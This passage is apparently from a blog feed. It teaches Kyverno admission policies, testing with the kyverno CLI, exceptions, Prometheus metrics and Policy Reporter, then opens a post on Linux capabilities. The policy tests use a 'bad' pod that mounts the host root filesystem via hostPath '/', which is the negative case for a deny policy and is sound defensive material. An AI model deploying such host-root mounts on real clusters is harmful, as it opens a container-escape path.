  <span class="hljs-attr">any:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">resources:</span>
        <span class="hljs-attr">kinds:</span> [<span class="hljs-string">"Pod"</span>]
        <span class="hljs-attr">namespaces:</span> [<span class="hljs-string">"prod"</span>]
    <span class="hljs-bullet">-</span> <span class="hljs-attr">resources:</span>
        <span class="hljs-attr">kinds:</span> [<span class="hljs-string">"Pod"</span>]
        <span class="hljs-attr">selector:</span>
          <span class="hljs-attr">matchLabels:</span>
            <span class="hljs-attr">app:</span> <span class="hljs-string">backend</span>
</code></pre>
<h3 id="heading-match-quick-reference">Match Quick Reference</h3>
<div class="hn-table">
<table>
<thead>
<tr>
<td>Field</td><td>What it does</td><td>Notes</td></tr>
</thead>
<tbody>
<tr>
<td><code>kinds</code></td><td>Resource kind (<code>Pod</code>, <code>Deployment</code>, etc.)</td><td>Case-sensitive.</td></tr>
<tr>
<td><code>names</code></td><td>Specific object names</td><td>Exact match only.</td></tr>
<tr>
<td><code>namespaces</code></td><td>Namespace name(s)</td><td>Ignored for cluster-scoped kinds.</td></tr>
<tr>
<td><code>selector</code></td><td>Labels on the resource</td><td>Standard <code>matchLabels</code>/<code>matchExpressions</code>.</td></tr>
<tr>
<td><code>annotations</code></td><td>Match by annotations</td><td>Same syntax as labels.</td></tr>
<tr>
<td><code>operations</code></td><td>Admission verbs</td><td><code>CREATE</code>, <code>UPDATE</code>, <code>DELETE</code>, <code>CONNECT</code>.</td></tr>
<tr>
<td><code>userInfo</code></td><td>Who made the request</td><td>Roles, clusterRoles, users, service accounts.</td></tr>
</tbody>
</table>
</div><p><strong>To use:</strong></p>
<ul>
<li><code>resources</code>: select by names, namespaces, kinds, operations, labels, annotations, and namespace selectors.  </li>
<li><code>subjects</code>: select users, groups, and service accounts.  </li>
<li><code>roles</code>: select namespaced roles.  </li>
<li><code>clusterRoles</code>: select cluster-wide roles.  </li>
</ul>
<h3 id="heading-preconditions">Preconditions</h3>
<p>If <code>match</code>/<code>exclude</code> got you in the door, <strong>preconditions</strong> let you add “only if…” filters. They run <em>after</em> match/exclude but before action.  </p>
<pre><code class="lang-yaml"><span class="hljs-comment"># Only when hostNetwork=true</span>
<span class="hljs-attr">preconditions:</span>
  <span class="hljs-attr">all:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span> <span class="hljs-string">"<span class="hljs-template-variable">{{ request.object.spec.hostNetwork }}</span>"</span>
      <span class="hljs-attr">operator:</span> <span class="hljs-string">Equals</span>
      <span class="hljs-attr">value:</span> <span class="hljs-literal">true</span>
</code></pre>
<p>Great for scoping rules by field presence, among other things. </p>
<h3 id="heading-patterns-the-real-work">Patterns: The Real Work</h3>
<p>Once a rule <em>applies</em>, Kyverno still needs to know <strong>what inside the YAML you care about</strong>. That’s where <code>pattern</code> (or <code>anyPattern</code>) comes in.  </p>
<p>Patterns are structural YAML matches, not regexes. You describe the shape/values you expect, and Kyverno checks them.  </p>
<ul>
<li><code>pattern</code> — all conditions must be satisfied.  </li>
<li><code>anyPattern</code> — resource passes if it matches <em>any</em> of the listed patterns.  </li>
</ul>
<pre><code class="lang-yaml"><span class="hljs-attr">validate:</span>
  <span class="hljs-attr">pattern:</span>
    <span class="hljs-attr">spec:</span>
      <span class="hljs-attr">securityContext:</span>
        <span class="hljs-attr">runAsNonRoot:</span> <span class="hljs-literal">true</span>
</code></pre>
<pre><code class="lang-yaml"><span class="hljs-attr">validate:</span>
  <span class="hljs-attr">anyPattern:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">spec:</span>
        <span class="hljs-attr">securityContext:</span>
          <span class="hljs-attr">runAsUser:</span> <span class="hljs-number">1000</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">spec:</span>
        <span class="hljs-attr">securityContext:</span>
          <span class="hljs-attr">runAsNonRoot:</span> <span class="hljs-literal">true</span>
</code></pre>
<p>This is just scratching the surface, but it gives a basic overview to use Kyverno effectively.</p>
<h3 id="heading-a-note-on-cel">A Note on CEL</h3>
<p>Patterns today are Kyverno’s own YAML-driven DSL with some JMESPath helpers. <a target="_blank" href="https://cel.dev/">CEL</a> support is coming (and will eventually unify expression logic across Kubernetes), but for now: stick with patterns.  </p>
<hr />
<h2 id="heading-testing-policies-with-kyverno-test">Testing Policies with <code>kyverno test</code></h2>
<p>Before you unleash a new policy on your cluster, it’s worth <a target="_blank" href="https://kyverno.io/docs/testing-policies/">testing it locally</a>. That’s what <code>kyverno test</code> is for: simulating policy evaluations against sample resources, <strong>without</strong> creating or blocking anything in Kubernetes.</p>
<p>Unlike <code>kyverno apply</code>, which is handy for quick checks, <code>kyverno test</code> is built for <strong>programmatic, repeatable testing</strong>. It evaluates match criteria (kinds, namespaces, labels, annotations) exactly like the admission controller would, so you can see which rules apply and which get skipped.</p>
<h3 id="heading-example-policy">Example Policy</h3>
<p>Here’s our <code>block-hostpath.yaml</code> validating policy from Part 2:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">kyverno.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">ClusterPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">block-hostpath</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">validationFailureAction:</span> <span class="hljs-string">Enforce</span>
  <span class="hljs-attr">rules:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">disallow-hostpath</span>
      <span class="hljs-attr">match:</span>
        <span class="hljs-attr">resources:</span>
          <span class="hljs-attr">kinds:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-string">Pod</span>
          <span class="hljs-attr">selector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">app:</span> <span class="hljs-string">kyverno-demo</span>
      <span class="hljs-attr">validate:</span>
        <span class="hljs-attr">message:</span> <span class="hljs-string">"hostPath volumes are not allowed."</span>
        <span class="hljs-attr">pattern:</span>
          <span class="hljs-attr">spec:</span>
            <span class="hljs-attr">volumes:</span>
              <span class="hljs-bullet">-</span> <span class="hljs-string">=(hostPath):</span> <span class="hljs-string">"absent"</span>
</code></pre>
<p>Notice the <code>selector</code>, which means this rule only applies to Pods labeled <code>app=kyverno-demo</code>. If your resource doesn’t match that, the test will skip it.</p>
<h3 id="heading-setting-up-a-test-directory">Setting Up a Test Directory</h3>
<p>Let's create a place to store our tests. This will make it more manageable as you would expect.</p>
<pre><code class="lang-bash">mkdir kyverno-tests
<span class="hljs-built_in">cd</span> kyverno-tests
cp /path/to/block-hostpath.yaml .
</code></pre>
<h3 id="heading-create-a-passing-and-failing-pod">Create a Passing and Failing Pod</h3>
<p>Bad Pod (should fail):</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">bad-pod</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">kyverno-demo</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">containers:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">nginx</span>
      <span class="hljs-attr">image:</span> <span class="hljs-string">nginx</span>
  <span class="hljs-attr">volumes:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">root-mount</span>
      <span class="hljs-attr">hostPath:</span>
        <span class="hljs-attr">path:</span> <span class="hljs-string">/</span>
</code></pre>
<p>Good Pod (should pass):</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">good-pod</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">kyverno-demo</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">containers:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">nginx</span>
      <span class="hljs-attr">image:</span> <span class="hljs-string">nginx</span>
</code></pre>
<h3 id="heading-create-a-test">Create a Test</h3>
<p>Now let’s create a test manifest to check both pods against the policy.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cli.kyverno.io/v1alpha1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Test</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">kyverno-test</span>
<span class="hljs-attr">policies:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-string">block-hostpath.yaml</span>
<span class="hljs-attr">resources:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-string">bad-pod.yaml</span>
  <span class="hljs-bullet">-</span> <span class="hljs-string">good-pod.yaml</span>
<span class="hljs-attr">results:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">policy:</span> <span class="hljs-string">block-hostpath</span>
  <span class="hljs-attr">rule:</span> <span class="hljs-string">disallow-hostpath</span>
  <span class="hljs-attr">result:</span> <span class="hljs-string">pass</span>
</code></pre>
<p>This tells the Kyverno CLI three things:</p>
<ul>
<li><strong>policies</strong>: which policy files to load (<code>block-hostpath.yaml</code>)  </li>
<li><strong>resources</strong>: which resource manifests to run those policies against (<code>bad-pod.yaml</code>, <code>good-pod.yaml</code>)  </li>
<li><strong>results</strong>: what you expect to happen. Here, the <code>disallow-hostpath</code> rule should pass for the given resource.</li>
</ul>
<h3 id="heading-running-the-test">Running the Test</h3>
<p>Save the manifest as <code>kyverno-test.yaml</code> and run:</p>
<pre><code class="lang-bash">kyverno <span class="hljs-built_in">test</span> .
</code></pre>
<p>Example output:</p>
<pre><code class="lang-bash">│ ID │ POLICY         │ RULE              │ RESOURCE                │ RESULT │ REASON              │
│────│────────────────│───────────────────│─────────────────────────│────────│─────────────────────│
│ 1  │ block-hostpath │ disallow-hostpath │ v1/Pod/default/good-pod │ Fail   │ Want pass, got fail │
│ 2  │ block-hostpath │ disallow-hostpath │ v1/Pod/default/bad-pod  │ Fail   │ Want pass, got fail │

Test Summary: 0 tests passed and 2 tests failed
Error: 2 tests failed
</code></pre>
<p>The pods respect the policy when applied to a live cluster, but the test fails. Why? Because of how we wrote the pattern:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">pattern:</span>
  <span class="hljs-attr">spec:</span>
    <span class="hljs-attr">volumes:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">=(hostPath):</span> <span class="hljs-string">"absent"</span>
</code></pre>
<p>If the <code>volumes</code> block is completely missing, the test still fails. To handle this, we need <code>anyPattern</code>.</p>
<h3 id="heading-fixing-with-anypattern">Fixing with <code>anyPattern</code></h3>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">kyverno.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">ClusterPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">block-hostpath-updated</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">validationFailureAction:</span> <span class="hljs-string">Enforce</span>
  <span class="hljs-attr">rules:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">disallow-hostpath</span>
      <span class="hljs-attr">match:</span>
        <span class="hljs-attr">resources:</span>
          <span class="hljs-attr">kinds:</span> [<span class="hljs-string">"Pod"</span>]
          <span class="hljs-attr">selector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">app:</span> <span class="hljs-string">kyverno-demo</span>
      <span class="hljs-attr">validate:</span>
        <span class="hljs-attr">message:</span> <span class="hljs-string">"hostPath volumes are not allowed."</span>
        <span class="hljs-attr">anyPattern:</span>
          <span class="hljs-bullet">-</span> <span class="hljs-attr">spec:</span>
              <span class="hljs-string">=(volumes):</span> <span class="hljs-string">"absent"</span>
          <span class="hljs-bullet">-</span> <span class="hljs-attr">spec:</span>
              <span class="hljs-attr">volumes:</span>
                <span class="hljs-bullet">-</span> <span class="hljs-string">=(hostPath):</span> <span class="hljs-string">"absent"</span>
</code></pre>
<p>Update the test to use this policy:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cli.kyverno.io/v1alpha1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Test</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">kyverno-test</span>
<span class="hljs-attr">policies:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-string">block-hostpath-updated.yaml</span>
<span class="hljs-attr">resources:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-string">bad-pod.yaml</span>
  <span class="hljs-bullet">-</span> <span class="hljs-string">good-pod.yaml</span>
<span class="hljs-attr">results:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">policy:</span> <span class="hljs-string">block-hostpath-updated</span>
  <span class="hljs-attr">rule:</span> <span class="hljs-string">disallow-hostpath</span>
  <span class="hljs-attr">result:</span> <span class="hljs-string">pass</span>
</code></pre>
<p>Run again:</p>
<pre><code class="lang-bash">│ ID │ POLICY                 │ RULE              │ RESOURCE                │ RESULT │ REASON │
│────│────────────────────────│───────────────────│─────────────────────────│────────│────────│
│ 1  │ block-hostpath-updated │ disallow-hostpath │ v1/Pod/default/good-pod │ Pass   │ Ok     │
│ 2  │ block-hostpath-updated │ disallow-hostpath │ v1/Pod/default/bad-pod  │ Fail   │ Want pass, got fail │

Test Summary: 1 tests passed and 1 tests failed
Error: 1 tests failed
</code></pre>
<p>Perfect! The good pod now passes while the bad pod still fails.</p>
<h3 id="heading-next-steps">Next Steps</h3>
<p>There’s much more you can do with tests, including variables, JSON patches, and negative cases. If you want to level up further, check out <a target="_blank" href="https://kyverno.io/docs/kyverno-chainsaw/">Chainsaw</a>, a more advanced testing project for Kyverno.</p>
<hr />
<h2 id="heading-exceptions-two-practical-paths">Exceptions (Two Practical Paths)</h2>
<p>You’ll need exceptions. The trick is making them <strong>surgical</strong>, not blanket “turn it all off.” Here are two clean approaches.</p>
<h3 id="heading-option-1-use-the-exclude-block-fast-and-built-in">Option 1 — Use the <code>exclude</code> Block (Fast and Built-In)</h3>
<p>Keep a single global policy and carve out narrowly with <code>exclude</code>. Four common exclusion types:</p>
<p><strong>Namespace carve-out:</strong></p>
<pre><code class="lang-yaml"><span class="hljs-attr">exclude:</span>
  <span class="hljs-attr">resources:</span>
    <span class="hljs-attr">namespaces:</span> [<span class="hljs-string">"legacy-systems"</span>, <span class="hljs-string">"migration"</span>, <span class="hljs-string">"bleeding-edge"</span>]
</code></pre>
<p>Predictable, but blunt. Whole namespaces get a hall pass.</p>
<p><strong>Label-based carve-out:</strong></p>
<pre><code class="lang-yaml"><span class="hljs-attr">exclude:</span>
  <span class="hljs-attr">resources:</span>
    <span class="hljs-attr">selector:</span>
      <span class="hljs-attr">matchLabels:</span>
        <span class="hljs-attr">kyverno-exempt:</span> <span class="hljs-string">"true"</span>
</code></pre>
<p>Tactical: mark a pod with <code>kyverno-exempt=true</code> and it skips evaluation.</p>
<p><strong>Role-based carve-out:</strong></p>
<pre><code class="lang-yaml"><span class="hljs-attr">exclude:</span>
  <span class="hljs-attr">any:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">clusterRoles:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">cluster-admin</span>
</code></pre>
<p>If <code>cluster-admin</code> creates it, hands off. (Sometimes you need to respect the crown.)</p>
<p><strong>Subject-targeted carve-out:</strong></p>
<pre><code class="lang-yaml"><span class="hljs-attr">exclude:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">subjects:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">kind:</span> <span class="hljs-string">User</span>
      <span class="hljs-attr">name:</span> <span class="hljs-string">CloudSecBurrito</span>
</code></pre>
<p>Skip checks for one named user. Minimal and very explicit.</p>
<hr />
<h3 id="heading-option-2-policyexception-crd-surgical-and-auditable">Option 2 — PolicyException CRD (Surgical and Auditable)</h3>
<p>When you need to exempt <strong>one rule of one policy</strong> for a <strong>specific target</strong>, use the <code>PolicyException</code> CRD. It doesn’t touch the original policy, and it’s easy to audit later.</p>
<p>You’ll need to enable it (disabled by default). Example flow:</p>
<pre><code class="lang-bash">kubectl create namespace kyverno-exceptions

kubectl -n kyverno patch deploy kyverno-admission-controller --<span class="hljs-built_in">type</span>=<span class="hljs-string">'json'</span> -p=<span class="hljs-string">'[
  {"op":"add","path":"/spec/template/spec/containers/0/args/-","value":"--enablePolicyException=true"},
  {"op":"add","path":"/spec/template/spec/containers/0/args/-","value":"--exceptionNamespace=kyverno-exceptions"}
]'</span>
</code></pre>
<p>Check which versions are supported:</p>
<pre><code class="lang-bash">kubectl get crd policyexceptions.kyverno.io -o jsonpath=<span class="hljs-string">'{range .spec.versions[*]}{.name}{"\t"}{.served}{"\t"}{.storage}{"\n"}{end}'</span>
</code></pre>
<p>If you see <code>v2 true true</code>, your manifest should use <code>apiVersion: kyverno.io/v2</code>.</p>
<p><strong>Example exception</strong> — exempt one pod from the <code>block-hostpath</code> rule:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">kyverno.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">PolicyException</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">allow-special-pod</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">kyverno-exceptions</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">exceptions:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">policyName:</span> <span class="hljs-string">block-hostpath</span>
      <span class="hljs-attr">ruleNames:</span> [<span class="hljs-string">"disallow-hostpath"</span>]
  <span class="hljs-attr">match:</span>
    <span class="hljs-attr">any:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-attr">resources:</span>
          <span class="hljs-attr">kinds:</span> [<span class="hljs-string">"Pod"</span>]
          <span class="hljs-attr">namespaces:</span> [<span class="hljs-string">"default"</span>]
          <span class="hljs-attr">names:</span> [<span class="hljs-string">"special-pod"</span>]
</code></pre>
<p>Now that pod runs, but the policy stays enforced everywhere else. Surgical, auditable, and controlled.</p>
<hr />
<h2 id="heading-monitoring-kyverno-with-prometheus">Monitoring Kyverno with Prometheus</h2>
<p>You don’t need 12 dashboards to prove policies work. Just scrape Kyverno, run a couple queries, and move on. Prometheus pros can skip ahead.</p>
<h3 id="heading-basic-setup-kube-prometheus-stack">Basic setup (kube-prometheus-stack)</h3>
<p>Deploy Prometheus (yes, Grafana comes along for the ride, we’re ignoring it):</p>
<pre><code class="lang-bash">helm repo add prometheus-community https://prometheus-community.github.io/helm-charts
helm repo update
kubectl create namespace monitoring
helm install kube-prom prometheus-community/kube-prometheus-stack -n monitoring
</code></pre>
<p>Patch it to NodePort so you can hit it locally:</p>
<pre><code class="lang-bash">kubectl patch svc kube-prom-kube-prometheus-prometheus   -n monitoring   -p <span class="hljs-string">'{"spec": {"type": "NodePort"}}'</span>
kubectl get svc kube-prom-kube-prometheus-prometheus -n monitoring -o wide
</code></pre>
<p>Access Prometheus at something like <code>http://192.168.64.7:31559/</code>. Cool. Now onto the ServiceMonitor.</p>
<h3 id="heading-configure-a-servicemonitor-for-kyverno">Configure a ServiceMonitor for Kyverno</h3>
<p>Create a <strong>ServiceMonitor</strong> that matches kube-prometheus-stack’s selector (<code>release: kube-prom</code>):</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">monitoring.coreos.com/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">ServiceMonitor</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">kyverno-metrics</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">kyverno</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">release:</span> <span class="hljs-string">kube-prom</span>   <span class="hljs-comment"># IMPORTANT: must match Prometheus CR serviceMonitorSelector</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app.kubernetes.io/name:</span> <span class="hljs-string">kyverno-admission-controller</span>
  <span class="hljs-attr">namespaceSelector:</span>
    <span class="hljs-attr">matchNames:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">kyverno</span>
  <span class="hljs-attr">endpoints:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">targetPort:</span> <span class="hljs-number">8000</span>
      <span class="hljs-attr">path:</span> <span class="hljs-string">/metrics</span>
      <span class="hljs-attr">interval:</span> <span class="hljs-string">30s</span>
</code></pre>
<p>Apply it, then check /targets in Prometheus UI to confirm Kyverno is UP.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1755576247462/e5fae915-b604-4748-b228-1bde22b79970.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-a-couple-queries">A Couple Queries</h3>
<p>Failures for Pods in the default namespace over the last 5 minutes (create something broken first so it is guaranteed to show data):</p>
<pre><code class="lang-promql">kyverno_policy_results_total{rule_result="fail",resource_kind="Pod",resource_namespace="default"}[5m]
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1755576186863/2bab5086-2bca-4a9a-90d3-b1b50aaf03ee.png" alt class="image--center mx-auto" /></p>
<p>Policy changes (create a new policy, then refresh the query):</p>
<pre><code class="lang-promql">kyverno_policy_changes_total
</code></pre>
<p>And for a quick heartbeat check, make sure Kyverno’s alive at all:</p>
<pre><code class="lang-promql">kyverno_info
</code></pre>
<p>That’s it. Prometheus is scraping Kyverno, queries return real numbers, and you didn’t even need to pretend to like dashboards.</p>
<hr />
<h2 id="heading-policy-reporter-your-friendly-dashboard">Policy Reporter – Your Friendly Dashboard</h2>
<p>For the finale, let’s spin up a dashboard. No Grafana this time — we’ll use the adjacent project <a target="_blank" href="https://kyverno.github.io/policy-reporter-docs/">Policy Reporter</a>.</p>
<h3 id="heading-setup">Setup</h3>
<p>Deploy with Helm:</p>
<pre><code class="lang-bash">helm repo add policy-reporter https://kyverno.github.io/policy-reporter
helm repo update
helm install policy-reporter policy-reporter/policy-reporter --create-namespace -n policy-reporter --<span class="hljs-built_in">set</span> ui.enabled=<span class="hljs-literal">true</span>
</code></pre>
<p>Expose it via NodePort:</p>
<pre><code class="lang-bash">kubectl patch -n policy-reporter svc policy-reporter-ui -p <span class="hljs-string">'{"spec": {"type": "NodePort"}}'</span>
kubectl get svc -n policy-reporter policy-reporter-ui -o wide
</code></pre>
<p>Now hit it in your browser just like Prometheus, e.g. <code>http://192.168.64.7:31864/</code>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1755576314555/d5e66ef6-0d42-43b2-99cf-b6d6d05d5a1f.png" alt class="image--center mx-auto" /></p>
<p>You’ll see a clean UI with policy passes, failures, and violations grouped by rule and namespace.
Instant dashboards for your Kyverno policies. Turns out not all dashboards are evil after all.</p>
<hr />
<h2 id="heading-borrowing-from-the-upstream-policy-library">Borrowing from the Upstream Policy Library</h2>
<p>Kyverno ships with an extensive <a target="_blank" href="https://kyverno.io/policies/">policy library</a> you can pull from for quick, high-impact wins. Instead of writing every rule yourself, lean on what’s already been proven. A few highlights worth adopting right away:  </p>
<ul>
<li><p><strong>Restrict automounting service account tokens</strong><br /><a target="_blank" href="https://kyverno.io/policies/other/restrict-sa-automount-sa-token/restrict-sa-automount-sa-token/">Policy link</a><br />Prevents workloads from automatically mounting a service account token unless explicitly allowed. Cuts down on “accidental” privilege handouts.  </p>
</li>
<li><p><strong>Block cluster-admin role bindings</strong><br /><a target="_blank" href="https://kyverno.io/policies/other/restrict-binding-clusteradmin/restrict-binding-clusteradmin/">Policy link</a><br />Stops developers (or attackers) from casually granting themselves cluster-admin. Because least privilege means <em>least</em>. </p>
</li>
<li><p><strong>Deny role escalation verbs</strong><br /><a target="_blank" href="https://kyverno.io/policies/other/restrict-escalation-verbs-roles/restrict-escalation-verbs-roles/">Policy link</a><br />Prevents roles from including verbs like <code>escalate</code> or <code>impersonate</code> that let users jump trust boundaries.  </p>
</li>
<li><p><strong>Ban wildcard verbs in roles</strong><br /><a target="_blank" href="https://kyverno.io/policies/other/restrict-wildcard-verbs/restrict-wildcard-verbs/">Policy link</a><br />Avoids the dreaded <code>*</code> in RBAC rules. Force teams to think about what permissions they actually need, rather than granting everything by default.  </p>
</li>
</ul>
<p>Each of these tackles real-world abuse paths we’ve seen exploited. They’re a fast way to raise the floor on cluster security without spending weeks hand-crafting policies.  </p>
<hr />
<h2 id="heading-wrap-up">Wrap Up</h2>
<p>We’ve covered a lot of ground in this trilogy.  </p>
<p>In <a target="_blank" href="https://cloudsecburrito.com/control-issues-tales-of-kubernetes-admission">Part 1</a>, we got down to the nitty-gritty of raw admission control — even wiring up our own admission controller. We also looked at Pod Security Admission, Kubernetes’ built-in controller that’s… let’s just say, not exactly the sharpest tool in the shed.  </p>
<p>In <a target="_blank" href="https://cloudsecburrito.com/control-issues-real-policies-in-minutes-with-kyverno">Part 2</a>, we dove into Kyverno itself. We covered the different policy types and ran through concrete, working examples.  </p>
<p>This series coincided with my <a target="_blank" href="https://www.youtube.com/watch?v=6ZgnzCzz5gs&amp;t=8s">BSides Las Vegas talk</a> (jump to ~17:13 if you want to watch me sweat through slides). I picked Kyverno partly because of that talk, but mostly because I genuinely believe admission control should be mandatory in any Kubernetes cluster.  </p>
<p>I haven’t given Gatekeeper or jsPolicy their fair shake yet, but I will. I started here because Kyverno is approachable, all YAML, and still powerful. Between the CLI, policy types, and extra tooling like dashboards, it gives you everything you need to get real work done. You don’t need to gold-plate everything to be effective; Kyverno strikes a good balance between power and usability.  </p>
<p>The time you invest in Kyverno will pay off. Big time. And with that, after three posts, one conference talk, and far too much self-flattery, we can finally call it a wrap.  </p>
]]></content:encoded></item><item><title><![CDATA[Linux Capabilities: A Beginner's Overview]]></title><description><![CDATA[Over the past few months, I’ve been testing root and non-root containers. Naturally, that led me deep into the Kubernetes securityContext: options for both pods and containers. There’s a lot packed into that field. And a handful of particularly inter...]]></description><link>https://cloudsecburrito.com/linux-capabilities-a-beginners-overview</link><guid isPermaLink="true">https://cloudsecburrito.com/linux-capabilities-a-beginners-overview</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Linux]]></category><category><![CDATA[Security]]></category><category><![CDATA[containers]]></category><category><![CDATA[capabilities]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Mon, 11 Aug 2025 23:29:25 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1754947179650/32c806d0-9164-4591-b4bd-05d68696b168.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Over the past few months, I’ve been testing root and non-root containers. Naturally, that led me deep into the Kubernetes <code>securityContext:</code> options for both pods and containers. There’s a lot packed into that field. And a handful of particularly interesting knobs that stand out:</p>
<ul>
<li>Linux Security Modules (LSMs)  </li>
<li>Capabilities  </li>
<li>Seccomp  </li>
</ul>
<p>But here’s the thing: all of these are <strong>just Linux</strong>. Kubernetes is merely surfacing functionality the kernel has had for decades.</p>
<p>I’ve already gone down the <a target="_blank" href="https://cloudsecburrito.com/kubernetes-runtime-enforcement-with-kubearmor">LSM rabbit hole</a>. In that post, I focused on AppArmor. And for now, I’m resisting the urge to dive into SELinux or SMACK. So let’s call that part of the journey complete for now.</p>
<p>Now it’s time to explore <strong>Linux capabilities</strong>. They’re surprisingly simple once you understand the model. You can dive deep in the <a target="_blank" href="https://man7.org/linux/man-pages/man7/capabilities.7.html">man page</a>. It starts like this:</p>
<blockquote>
<p>“Traditional UNIX implementations distinguish two categories of processes: privileged processes (whose effective user ID is 0, referred to as superuser or root), and unprivileged processes (whose effective UID is nonzero).<br />Privileged processes bypass all kernel permission checks, while unprivileged processes are subject to full permission checking based on the process's credentials.”</p>
</blockquote>
<p>So where do capabilities come into play?</p>
<blockquote>
<p>“Starting with Linux 2.2, Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities.”</p>
</blockquote>
<p>And you can see the difference right in the kernel source.<br />In Linux <strong>2.0.40</strong>, there’s <a target="_blank" href="https://elixir.bootlin.com/linux/2.0.40/source/fs/open.c">no mention of capabilities at all</a> — just hardcoded UID checks like <code>if (!suser()) return -EPERM;</code>. But by Linux <strong>2.2.22</strong>, <a target="_blank" href="https://elixir.bootlin.com/linux/2.2.22/source/fs/open.c"><code>fs/open.c</code></a> has been rewritten to use checks like <code>!capable(CAP_SYS_CHROOT)</code>, showing the shift to fine-grained privilege control.</p>
<p>So here's the reality. In modern Linux, we shouldn’t limit risk management to <code>root</code> alone, because <strong>privilege isn’t binary anymore</strong>.  It’s been split into a collection of discrete powers, each represented by a <strong>capability</strong>. And if you don’t understand which ones your process holds, you might not fully understand what it can actually do.</p>
<p>For example:</p>
<ul>
<li><code>CAP_NET_RAW</code>: allow raw sockets</li>
<li><code>CAP_SYS_ADMIN</code>: let's say <a target="_blank" href="https://github.com/torvalds/linux/blob/master/include/uapi/linux/capability.h#L243-L279">a lot</a></li>
<li><code>CAP_SYS_PTRACE</code>: ptrace() of any process</li>
<li><code>CAP_DAC_OVERRIDE</code>: override all DAC access</li>
</ul>
<p>Security should involve an understanding of what your workloads are <em>already allowed</em> to do, and what the kernel will or won’t stop. Let’s talk about Linux capabilities. </p>
<hr />
